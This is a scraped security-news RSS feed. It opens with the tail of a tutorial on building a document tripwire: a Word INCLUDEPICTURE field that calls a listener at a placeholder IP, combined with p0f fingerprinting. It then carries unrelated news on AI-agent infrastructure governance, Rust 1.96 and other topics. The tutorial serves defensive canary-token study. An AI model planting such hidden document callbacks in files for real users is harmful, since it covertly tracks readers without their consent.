while passive fingerprinting may provide another hint about what kind of system is interacting with the listener.</p><p><em>p0f does not ask the remote machine what it is. It quietly observes how the machine builds its TCP packets — things like window size, TTL, MSS, TCP options, option order, timestamps, and other small implementation quirks. Then it compares those patterns against known fingerprints to infer the likely operating system.</em></p><p>Again, this does not create certainty. It creates context. That distinction matters.</p><p><strong>Objective:</strong> passively observe the connection and attempt to infer operating system characteristics.</p><p>Install p0f:</p><pre>sudo apt install -y p0f</pre><p>Then run it on the interface that will receive the callback. In my example, the interface is ens3, but yours may be different:</p><pre>sudo p0f -i ens3 -o /tmp/p0f_local.log 'tcp port 8080'</pre><p>The expected result is that p0f writes passive fingerprinting observations to:</p><pre>/tmp/p0f_local.log</pre><p>If p0f does not capture anything, verify the interface name:</p><pre>ip a</pre><p>Depending on your environment, the interface may be eth0, ens3, tun0, wlan0, or another name. If you are testing across a VPN, virtual machine, cloud host, or lab network, make sure p0f is listening on the interface that actually receives the traffic.</p><p>Now the lab has two layers. The Python server captures the application layer, while p0f observes the network layer. This allows us to compare what the client claims through HTTP with how the connection appears to behave on the wire.</p><p>That comparison is where the investigation becomes more interesting.</p><h3>Step 3: Make the Word Document Call Home</h3><p>For the document callback, I used a Word field that references the remote image. The detail that usually causes problems is that Word field braces are special. You cannot type them manually. Word must create them.</p><p><strong>Objective:</strong> make the Word document request the remote pixel from the Python listener.</p><p>Open Microsoft Word, place the cursor where you want the field to be inserted, and press:</p><pre>Ctrl + F9</pre><p>Word will create special field braces:</p><pre>{  }</pre><p>Inside those braces, insert the INCLUDEPICTURE field pointing to your listener:</p><pre>INCLUDEPICTURE "http://IP:8080/pixel.png" \d</pre><p>The final field should look like this:</p><pre>{ INCLUDEPICTURE "http://IP:8080/pixel.png" \d }</pre><p>Then update the field by pressing:</p><pre>F9</pre><p>You can also select the whole document and update fields with:</p><pre>Ctrl + A<br>F9</pre><p>If everything works, the document requests the remote pixel, the Python listener logs the callback, and p0f observes the connection. You now have a small canary-like lab that captures both HTTP metadata and passive network-layer context.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Iy0trv6yGpY-zgO4ZCqZnQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oxhNv6IxQsAkAqWLzr3nlw.png"></figure><p>If it fails, do not immediately assume the technique is broken. Check whether the Python server is running, whether the Word machine can reach the listener, whether port 8080 is allowed, whether Word is blocking external content, whether the file is in Protected View, whether the field braces were created correctly, and whether a proxy, sandbox, or security gateway is changing the behavior.</p><p>A failed callback can still be a finding. If external content is blocked, that may indicate good hardening. If the callback comes from a sandbox instead of the endpoint, that reveals inspection. If it comes directly from the endpoint, that tells a different story about egress and document handling.</p><p>🚀 <strong>If this helped you rethink threat attribution,</strong> follow me for more practical cybersecurity lessons from labs, tabletop exercises, red team thinking, and defensive analysis.</p><p>If this helped you rethink Canarytokens, <strong>drop a comment with what you would enrich first in your own lab: HTTP headers, proxy logs, EDR telemetry, DNS logs, p0f fingerprinting, or SIEM correlation.</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c39716d386f6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/beyond-canarytokens-building-a-diy-document-tripwire-with-passive-os-fingerprinting-c39716d386f6">Beyond Canarytokens: Building a DIY Document Tripwire with Passive OS Fingerprinting</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Preventing agent-generated infrastructure bloat through spec-driven governance]]></title>
<description><![CDATA[Autonomous AI engineer agents can deliver software at a scale in multiples of what a human engineering team can do, and that productivity is genuinely valuable. But without proper guardrails at the specification level, these agents can industrialise inefficient infrastructure patterns at the same...]]></description>
<link>https://tsecurity.de/de/3637960/ai-nachrichten/preventing-agent-generated-infrastructure-bloat-through-spec-driven-governance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637960/ai-nachrichten/preventing-agent-generated-infrastructure-bloat-through-spec-driven-governance/</guid>
<pubDate>Wed, 01 Jul 2026 11:19:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Autonomous AI engineer agents can deliver software at a scale in multiples of what a human engineering team can do, and that productivity is genuinely valuable. But without proper guardrails at the specification level, these agents can industrialise inefficient infrastructure patterns at the same pace, consistently and at a scale that makes post-deploy remediation impractical. When an agent provisions a three-node GKE cluster using n2-standard-16 machines for a workload a single e2-medium node could handle, or generates a Kubernetes pod spec with 4-CPU and 8GB memory requests for a service that peaks at 200 milli-cores and 256MB, or writes a Dockerfile that pulls a full Ubuntu base image where a distro-less container would serve, infrastructure runs that decision continuously, for the lifetime of the service. The agent will reproduce these patterns across every environment it touches, because the specification never instructed it otherwise. When agentic pipelines are generating infrastructure at scale, operational remediation after the fact becomes impractical.</p>



<p>The scale of what is now being generated autonomously is significant. <a href="https://www.infoworld.com/article/3999607/how-to-succeed-or-fail-with-ai-driven-development.html">InfoWorld’s reporting on AI-driven development</a> shows the pace of AI-generated output is accelerating sharply, and <a href="https://www.infoworld.com/article/3993479/what-we-know-now-about-generative-ai-for-software-development.html">projections suggest more than a quarter of new production code and configuration is already AI-generated</a>. What those projections do not yet capture is the shift from AI-assisted to fully agentic pipelines, where agents generate Terraform, Kubernetes manifests, Helm charts and Docker configurations end-to-end, commit them and trigger deployment, with no human in the loop or little oversight that concentrates on functional capabilities. When that pipeline runs without sustainability constraints, it systematically reproduces that infrastructure inefficiency across every environment it touches.</p>



<p>Green software has traditionally been an operational problem: Right-size the containers retrospectively, tune the cluster after the fact, schedule workloads in low-carbon windows. That approach was already struggling before agentic pipelines arrived. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-16-gartner-identifies-the-top-five-strategic-technology-trends-in-software-engineering-for-2024">Gartner projects</a> that by 2027, just 30% of large enterprises will have software sustainability embedded in their non-functional requirements. That statistic carries a consequence most engineering leaders have not yet confronted: If 70% of enterprise code has been written without sustainability intent, then the training data autonomous AI engineer agents learned from is dominated by potentially unsustainable patterns. An agent defaults to the majority pattern in its training distribution, which is the inefficient one. This makes the specification constraint not just a governance need, but a corrective instruction that the agent’s training data never provided.</p>



<h2 class="wp-block-heading">Sustainable specification as a reliable intervention point</h2>



<p>In a fully agentic development pipeline, the specification is not a document an engineer reads before writing code. It is the instruction set the agent executes. It determines which machine types get provisioned, which container base images get selected, how pod resource requests are sized, how storage is allocated and how networking is configured. Every infrastructure decision the agent makes downstream is a function of what the specification permitted or left undefined.</p>



<p>If the specification contains no sustainability constraints, the agent will make infrastructure decisions based on defaults, conventions and training data patterns, none of which are optimised for energy efficiency. An agent prompted to scaffold a GKE-based microservice will, by default, select machine types that ensure availability headroom rather than efficiency. It will size pod resource requests conservatively to avoid out-of-memory conditions from potentially inefficient application code, but not to minimise node utilization. It will pull familiar base images rather than minimal ones. These are not failures of the agent. They are the predictable output of an instruction set that never asked for sustainability.</p>



<p>The fix is to make sustainability a first-class constraint in the specification itself. A constraint such as GS-INFRA-001 (select the smallest GKE machine type that satisfies the workload’s measured resource ceiling, defaulting to e2-medium or smaller) or GS-K8S-001 (set pod CPU requests to measured p95 consumption with a 20% ceiling, not to arbitrary safe values) is a structured policy the agent reads before it generates a single line of Terraform or YAML. The agent does not override it. It executes it. That is the mechanism that makes sustainability structural and automated rather than aspirational.</p>



<h2 class="wp-block-heading">The infrastructure patterns that matter most</h2>



<p>Three infrastructure domains represent the highest-impact targets for sustainability constraints, precisely because autonomous AI engineer agents generate them prolifically and the consequences compound continuously at runtime rather than only when code executes.</p>



<p>The first is IaC and cloud resource provisioning. An agent generating a Terraform configuration for a GKE cluster defaults to instance families and node counts calibrated for resilience, not efficiency. A three-node cluster of n2-standard-16 machines (64 vCPUs, 192GB RAM) provisioned for a service that runs comfortably on a single e2-medium (2 vCPUs, 4GB RAM) represents a 32x over-provisioning of compute. That gap does not show up in staging. It runs in production, is billed continuously, emitting continuously. A sustainability constraint in the Terraform specification that enforces machine type selection against a measured workload profile eliminates this class of error before the agent writes its first resource block.</p>



<p>The second is the Kubernetes pod resource configuration. Pod resource requests are the input the Kubernetes scheduler uses to place workloads on nodes. When an autonomous AI engineer agent generates a pod spec with generous CPU and memory requests, the scheduler reserves that capacity whether the pod uses it or not. Nodes that could host eight efficiently-sized pods instead host two or three over-specified ones, leaving the remaining capacity stranded and the underlying VM running at low utilization. A pod spec with a 4-CPU, 8GB memory request for a service that observably consumes 200 millicores and 256MB at peak is not cautious engineering. It is a scheduler instruction to waste three and a half CPUs and 7.75GB of memory per pod, per node, per hour, across every replica in every environment. A sustainability constraint specifying that pod resource requests must be derived from measured p95 consumption data, not from defaults or intuition, changes this systematically.</p>



<p>The third is the container base image selection. When an agent generates a Dockerfile, it gravitates toward familiar, full-featured base images: Ubuntu, Debian, Python, Node.js. These images are large, carry a significant attack surface and consume more storage, memory and transfer bandwidth than their minimal equivalents. A distroless or Alpine-based image for the same workload can be an order of magnitude smaller. At the scale at which an autonomous AI engineer agent operates, pulling, storing and running bloated base images across hundreds of services is a significant and entirely avoidable infrastructure cost. A constraint specifying distroless or minimal base images as the default, with justification required for exceptions, eliminates the pattern without slowing generation.</p>



<h2 class="wp-block-heading">4 pipeline stages where constraints are enforced</h2>



<p>Embedding constraints in the specification is the intervention. Enforcing them through the pipeline is what makes the intervention reliable. Four stages create the enforcement architecture.</p>



<p>The first stage is generation itself. When sustainability constraints are part of the specification the autonomous AI engineer agent operates from, those constraints shape every artifact the agent produces: Terraform resource blocks, Kubernetes manifests, Helm chart defaults, Dockerfile base image selections. The agent does not reason about sustainability independently. It executes the specification. A well-constrained specification produces sustainable infrastructure by construction, not by review.</p>



<p>The second stage is static analysis. Tools including Checkov, tfsec, KICS and Trivy analyze Terraform, Kubernetes YAML and Dockerfiles against configurable policy rules without modifying the agent or the pipeline architecture. A Checkov policy enforcing the GKE machine type constraint, or a tfsec rule flagging over-provisioned node pools, runs against every artifact the agent generates before it reaches a deployment gate. The violation surfaces as structured CI output the gate acts on. The agent’s output is checked the same way a human engineer’s output would be, consistently, at every commit.</p>



<p>The third stage is the quality gate. Sustainability violations fail the build. They do not generate warnings that an agent pipeline has no mechanism to act on. A gate that blocks deployment on policy violations is the enforcement layer that makes constraints binding rather than advisory. Because the gate operates on artifact output rather than on the agent itself, it is fully autonomous AI engineer agent-agnostic: It does not matter whether the Terraform was generated by Copilot, a custom LLM pipeline, an internal scaffolding agent or a human engineer. The gate evaluates the artifact against the policy. That is the only thing that matters.</p>



<p>The fourth stage is runtime telemetry feeding back into constraint refinement. Actual resource utilization, node efficiency metrics and carbon intensity data from production inform constraint updates at the specification level. A constraint calibrated on design-time estimates tightens over time as empirical data replaces assumptions. The governance model improves continuously rather than stagnating at its initial calibration.</p>



<h2 class="wp-block-heading">3 steps to start this week</h2>



<p>Most engineering organizations already have everything they need to begin. The static analysis toolchain is there: Checkov, tfsec, KICS, Trivy and OPA Conftest all support configurable sustainability policies against Terraform, Kubernetes YAML and Dockerfile artifacts without pipeline replacement. The CI/CD pipeline is there: GitHub Actions, GitLab CI, Jenkins, Tekton and Azure DevOps Pipelines all support blocking quality gates against policy tool outputs. The specification layer is there: Terraform modules, Helm chart value schemas, Kubernetes admission controllers and architectural decision records are already version-controlled in most mature engineering organizations. And critically, this approach is a fully autonomous AI engineer agent-agnostic. The governance layer does not inspect which agent or model generated the infrastructure artifact. It enforces the policy against the output. Whether the Terraform came from a custom agentic pipeline, a Copilot suggestion or a human engineer, the gate applies identically. The only things genuinely missing are the sustainability constraint definitions authored into the specification and the policy rules wired into the CI/CD pipeline to enforce them. Three steps close that gap.</p>



<ol class="wp-block-list">
<li><strong>Audit your IaC specifications for sustainability constraints.</strong> Open an active Terraform module or Helm chart and locate the machine type defaults, pod resource request defaults and base image defaults. For most organizations, these are set to safe, familiar values with no sustainability rationale. Define three constraints: A maximum machine type ceiling for each workload tier, a pod resource request ceiling derived from measured utilization, and a base image policy requiring distro-less or Alpine equivalents. Version control these constraints alongside the specifications they govern.</li>



<li><strong>Add one Checkov or tfsec policy to your CI pipeline.</strong> A policy flagging GKE node pools configured above the e2-standard-4 threshold without a documented justification is implementable in under an hour using Checkov’s custom check API. Wire it as a blocking gate, not a warning. This single addition creates immediate, agent-agnostic enforcement across every Terraform commit in your repository.</li>



<li><strong>Embed sustainability constraints before you scale your agentic pipelines.</strong> The highest-leverage moment is now, before autonomous AI engineer agents are generating infrastructure at full organizational scale. Every agentic pipeline that goes into production without sustainability constraints in its specification becomes a systematic source of over-provisioned, carbon-intensive infrastructure that compounds daily. Retrofitting governance after hundreds of agent-generated services are running is an order of magnitude harder than constraining generation at the specification source.</li>
</ol>



<h2 class="wp-block-heading">What lies ahead</h2>



<p>The sustainability challenge discussed here is not the energy consumed by the AI engineer agent itself, but the long-lived infrastructure decisions encoded into the artifacts it generates. Sustainable infrastructure engineering is no longer an operational discipline. It is an architectural necessity, and the specification layer is where that necessity must be addressed. When autonomous AI engineer agents are generating Terraform, Kubernetes manifests and Docker configurations at scale, the organizations that embed sustainability constraints into the specifications those agents execute will build efficient, cost-controlled, regulation-ready infrastructure by construction. Those that do not will build a remediation programme instead, which at scale will become impractical.</p>



<p>The urgency is not speculative. <a href="https://spectrum.ieee.org/green-software/particle-2">IEEE Spectrum reports</a> that Microsoft’s emissions have risen 23% since its 2020 baseline and Google’s have climbed 51% since 2019, with AI infrastructure as the primary driver. <a href="https://spectrum.ieee.org/firms-bet-climate-tech">Global data centres are on track to consume more electricity than Japan by 2030.</a> A significant fraction of that load is over-provisioned infrastructure that an autonomous AI engineer agent generated from a specification that never asked for efficiency. The constraint cost is low. The compounding cost of the alternative is not.</p>



<p>The governance imperative is converging from three directions simultaneously. Cloud cost: Over-provisioned AI-generated infrastructure compounds spend at a rate that makes early specification-layer control orders of magnitude cheaper than post-deployment rightsizing programmes. Technical debt: Every agentic sprint that ships infrastructure without sustainability constraints adds configuration debt that grows faster than any platform team can retrospectively correct. Regulatory pressure: Sustainability reporting requirements, already mandatory in the EU and accelerating in other jurisdictions, will reach infrastructure efficiency metrics. Engineering organizations that have operationalised sustainability governance at the specification layer will meet those requirements as a natural output of their existing pipeline. Those who have not will discover that compliance is a crisis programme when the deadline arrives. These are not abstract architectural concerns. The organizations that govern agentic generation upstream, at the specification, will compound efficiency gains with every agent run, not just sustainability but cost, too. Those who govern only in production will spend a lot of time remediating what they should have prevented before the first line of Terraform was written.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want </a><a href="https://www.infoworld.com/expert-contributor-network/">to</a><a href="https://www.cio.com/expert-contributor-network/"> join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Madalina Petrea Runs Marketing for 27+ Cybersecurity Franchise Owners Across 4 Continents]]></title>
<description><![CDATA[CyberGlobal is the world's first cybersecurity franchise, with Madalina Petrea heading up marketing there. What does it mean to run marketing at a cyber franchise? Supporting 27+ franchise owners across the US, Europe, Africa, and Asia who sell cybersecurity services to small businesses in their ...]]></description>
<link>https://tsecurity.de/de/3637406/it-security-nachrichten/how-madalina-petrea-runs-marketing-for-27-cybersecurity-franchise-owners-across-4-continents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637406/it-security-nachrichten/how-madalina-petrea-runs-marketing-for-27-cybersecurity-franchise-owners-across-4-continents/</guid>
<pubDate>Wed, 01 Jul 2026 07:07:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CyberGlobal is the world's first cybersecurity franchise, with Madalina Petrea heading up marketing there. What does it mean to run marketing at a cyber franchise? Supporting 27+ franchise owners across the US, Europe, Africa, and Asia who sell cybersecurity services to small businesses in their local markets.

She joins Gianna to talk about what it takes to build that from the ground up. Her team handles everything for new franchisees in the first 90 days, including websites, LinkedIn profiles, content, and templates, so they can focus on learning the business. Her biggest challenge right now? Designing a system at 27 locations that still works at 200.

They also get into why paid ads worked in Dubai and Italy but not in Boston, and why SEO has become one of their most important growth channels, including showing up in AI search tools like ChatGPT and Perplexity.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust introduces new Range types]]></title>
<description><![CDATA[Rust 1.96.0 has arrived, bringing new Range* types to the programming language known for its memory safety.



Announced May 28, Rust 1.96.0 can be installed by current users by running the command rustup update stable. 



In elaborating on the new Range* types, the Rust team said many users exp...]]></description>
<link>https://tsecurity.de/de/3636819/ai-nachrichten/rust-introduces-new-range-types/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636819/ai-nachrichten/rust-introduces-new-range-types/</guid>
<pubDate>Tue, 30 Jun 2026 22:33:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Rust 1.96.0 has arrived, bringing new <code>Range*</code> types to the <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html" data-type="link" data-id="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">programming language</a> known for its <a href="https://www.infoworld.com/article/2336661/rust-memory-safety-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2336661/rust-memory-safety-explained.html">memory safety</a>.</p>



<p>Announced <a href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/">May 28,</a> Rust 1.96.0 can be installed by current users by running the command <code>rustup update stable</code>. </p>



<p>In elaborating on the new <code>Range*</code> types, the Rust team said many users expect <code>Range</code> and related <code>core::ops</code> types to be <code>Copy</code>, but this is not the case. These types implement <code>Iterator</code> directly, so “it is a <a href="https://rust-lang.github.io/rust-clippy/rust-1.95.0/index.html#copy_iterator" data-type="link" data-id="https://rust-lang.github.io/rust-clippy/rust-1.95.0/index.html#copy_iterator">footgun</a> to implement both <code>Iterator</code> and <code>Copy</code> on the same type”. <a href="https://rust-lang.github.io/rfcs/3550-new-range.html">RFC3550</a> proposed replacement range types that implement <code>IntoIterator</code> rather than <code>Iterator</code>, meaning they also can be <code>Copy</code>. The standard library portion of that RFC is now stable, introducing the types <code>core::range::Range</code>, <code>core::range::RangeFrom</code>, <code>core::range::RangeInclusive</code>, and associated iterators. </p>



<p>A future Rust version will add <code>core::range::RangeFull</code> and <code>core::range::RangeTo</code> as re-exports from <code>core::ops</code>. These do not implement <code>Iterator</code> and already implement <code>Copy</code>, the Rust team said. A future Rust version will also introduce <code>core::range::legacy::*</code> as the new home for the current ranges. Range syntax like <code>0..1</code> still produces the legacy types for now, the Rust team said, but will be updated to <code>core::range</code> types in an upcoming edition. With these stabilizations, it is now possible to store slice accessors in <code>Copy</code> types without splitting <code>start</code> and <code>end</code>, according to the team. Additionally, the new <code>RangeInclusive</code> type makes its fields public, unlike the legacy version that avoided exposing the exhausted iterator state.</p>



<p>Elsewhere in Rust 1.96.0, two new macros, <code>assert_matches!</code><strong> </strong>and <code>debug_assert_matches!</code>, check that a value matches a given pattern, panicking with a <code>Debug</code> representation of the value otherwise. And <a href="https://www.infoworld.com/article/2255892/what-is-webassembly-the-next-generation-web-platform-explained.html">WebAssembly</a> targets no longer pass <code>--allow-undefined</code> to the linker, which means that undefined symbols when linking are now a linker error instead of being converted to WebAssembly imports from the <code>"env"</code> module. This change prevents modules from linking unless all linking-related symbols are defined to catch bugs earlier and prevent accidental issues with symbol naming or similar.</p>



<p>The Rust team on <a href="https://blog.rust-lang.org/2026/06/30/Rust-1.96.1/">June 30</a> published a point release, Rust 1.96.1, which offers a series of fixes for Cargo, MIR, and libssh2: </p>



<ul class="wp-block-list">
<li><a href="https://github.com/rust-lang/cargo/pull/17131">Missing retries / timeouts in Cargo’s HTTP client</a></li>



<li><a href="https://github.com/rust-lang/rust/pull/158214">Miscompilation in a MIR optimization</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-15661">CVE-2025-15661</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-55199">CVE-2026-55199</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-55200">CVE-2026-55200</a></li>
</ul>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Leaked iPhone 18 Pro SIM Tray Hints At Dark Cherry Color]]></title>
<description><![CDATA[A fresh leak has given us another look at the possible color choices for the next premium smartphone from Apple. A well-known tipster recently shared an image online showing what appears to be a SIM card tray in a dark cherry shade. This small hardware part lines up perfectly with earlier rumors ...]]></description>
<link>https://tsecurity.de/de/3636517/ios-mac-os/new-leaked-iphone-18-pro-sim-tray-hints-at-dark-cherry-color/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636517/ios-mac-os/new-leaked-iphone-18-pro-sim-tray-hints-at-dark-cherry-color/</guid>
<pubDate>Tue, 30 Jun 2026 19:55:16 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A fresh leak has given us another look at the possible color choices for the next premium smartphone from Apple. A well-known tipster recently shared an image online showing what appears to be a SIM card tray in a dark cherry shade. This small hardware part lines up perfectly with earlier rumors that the tech giant is working on a rich, dark red finish for the upcoming iPhone 18 Pro models this fall.



A leaked tray confirms the deep red color is coming



The image surfaced on Weibo from a Chinese leaker named Ice Universe. It shows a small tray that looks burgundy, purple, or deep brown, depending on how you see it. This dark cherry shade is expected to be the signature color that the company pushes heavily in 2026. It looks like it will serve as a direct replacement for the Cosmic Orange finish seen on the iPhone 17 Pro.







If you were hoping for a darker, classic look, you might be out of luck. When a user asked the leaker if this new model would come in black, the answer was a simple no. This detail matches older reports suggesting we will not get a black version this year.



Instead, the phone maker plans to offer a few other options. Past information showed the device in light blue, dark gray, and silver. When you combine these with the new red shade, it matches exactly what early dummy units showed about the upcoming lineup.



We should find out the final details in September. That is when the company usually holds its big fall event to announce the next iPhone alongside its highly anticipated first foldable device. With the launch event moving closer, these small hardware leaks give us a very clear picture of exactly what to on store shelves.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Outpost VFX Uses AWS to Accelerate AI Model Training for Visual Effects]]></title>
<description><![CDATA[In this post, we explore how Outpost VFX achieved 8x faster training speeds using AWS infrastructure to transform their face replacement workflow, the technical architecture they implemented to overcome single-GPU limitations, and the measurable results achieved through AWS multi-GPU training.]]></description>
<link>https://tsecurity.de/de/3636328/ai-nachrichten/how-outpost-vfx-uses-aws-to-accelerate-ai-model-training-for-visual-effects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636328/ai-nachrichten/how-outpost-vfx-uses-aws-to-accelerate-ai-model-training-for-visual-effects/</guid>
<pubDate>Tue, 30 Jun 2026 18:47:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In this post, we explore how Outpost VFX achieved 8x faster training speeds using AWS infrastructure to transform their face replacement workflow, the technical architecture they implemented to overcome single-GPU limitations, and the measurable results achieved through AWS multi-GPU training.]]></content:encoded>
</item>
<item>
<title><![CDATA[Post Office delays signing Horizon replacement for third time]]></title>
<description><![CDATA[The Post Office has extended standstill period before formally signing contract for new EPOS system]]></description>
<link>https://tsecurity.de/de/3636321/it-nachrichten/post-office-delays-signing-horizon-replacement-for-third-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636321/it-nachrichten/post-office-delays-signing-horizon-replacement-for-third-time/</guid>
<pubDate>Tue, 30 Jun 2026 18:46:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Post Office has extended standstill period before formally signing contract for new EPOS system]]></content:encoded>
</item>
<item>
<title><![CDATA[Which AI chatbot is right for you? Take our quiz to find out whether ChatGPT, Claude, Gemini, Grok or Perplexity is best]]></title>
<description><![CDATA[ChatGPT, Claude, Perplexity, Gemini and Grok all have different strengths. Here's how to find the one that best matches the way you work.]]></description>
<link>https://tsecurity.de/de/3636270/it-nachrichten/which-ai-chatbot-is-right-for-you-take-our-quiz-to-find-out-whether-chatgpt-claude-gemini-grok-or-perplexity-is-best/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636270/it-nachrichten/which-ai-chatbot-is-right-for-you-take-our-quiz-to-find-out-whether-chatgpt-claude-gemini-grok-or-perplexity-is-best/</guid>
<pubDate>Tue, 30 Jun 2026 18:32:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ChatGPT, Claude, Perplexity, Gemini and Grok all have different strengths. Here's how to find the one that best matches the way you work.]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.384.0]]></title>
<description><![CDATA[What's Changed

Bazel: Fix prerelease filtering with same-release-line scoping by @v-HaripriyaC in #15332
Respect cooldown for Docker digest updates and suppress multi-arch no-ops by @robaiken in #15354
Bypass npmrc min-release-age for transitive npm security updates by @robaiken in #15386
Ratche...]]></description>
<link>https://tsecurity.de/de/3636212/it-security-tools/v03840/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636212/it-security-tools/v03840/</guid>
<pubDate>Tue, 30 Jun 2026 18:19:52 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Bazel: Fix prerelease filtering with same-release-line scoping by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669331291" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15332" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15332/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15332">#15332</a></li>
<li>Respect cooldown for Docker digest updates and suppress multi-arch no-ops by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701287300" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15354" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15354/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15354">#15354</a></li>
<li>Bypass npmrc min-release-age for transitive npm security updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725022446" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15386" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15386/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15386">#15386</a></li>
<li>Ratchet the Sorbet T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731460685" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15399" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15399/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15399">#15399</a></li>
<li>feat(docker): implement single-platform image detection and optimize manifest fetching logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpinz">@jpinz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727893963" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15390" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15390/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15390">#15390</a></li>
<li>Fix private registry config not found error not being raised issue in npm_and_yarn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729495132" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15394" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15394/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15394">#15394</a></li>
